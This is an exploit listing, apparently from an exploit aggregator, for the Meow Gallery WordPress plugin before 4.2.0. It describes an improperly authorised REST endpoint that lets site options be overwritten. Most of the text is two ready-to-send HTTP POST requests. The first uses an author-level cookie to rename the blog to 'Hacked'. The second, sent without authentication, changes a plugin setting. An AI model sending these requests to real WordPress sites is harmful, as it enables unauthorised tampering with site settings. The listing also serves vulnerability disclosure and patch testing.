Exploit for Meow Gallery < 4.2.0 - Unauthorised Arbitrary Options Update via REST API

Name: Exploit for Meow Gallery < 4.2.0 - Unauthorised Arbitrary Options Update via REST API
Rating: 5 (343 reviews)

2021-09-02 | CVSS -0.0

## https://sploitus.com/exploit?id=WPEX-ID:6CD95445-22BD-4666-8CF3-7979BFA5422D
In version below 4.1.6, any WP options can be changed, such as the blog name etc. Since v4.1.6, only the options belonging to the plugin can be changed (see https://plugins.trac.wordpress.org/browser/meow-gallery/trunk/classes/rest.php?rev=2590365#L90 for the list)

POST /wp-json/meow-gallery/v1/update_option/ HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [author+]
Content-Type: application/json; charset=UTF-8
Content-Length: 37

{"name":"blogname", "value":"Hacked"}


In v4.1.9, unauthenticated user can call the endpoint

POST /wp-json/meow-gallery/v1/update_option/ HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json; charset=UTF-8
Content-Length: 42
Connection: close

{"name":"mgl_layout", "value":"arbitrary"}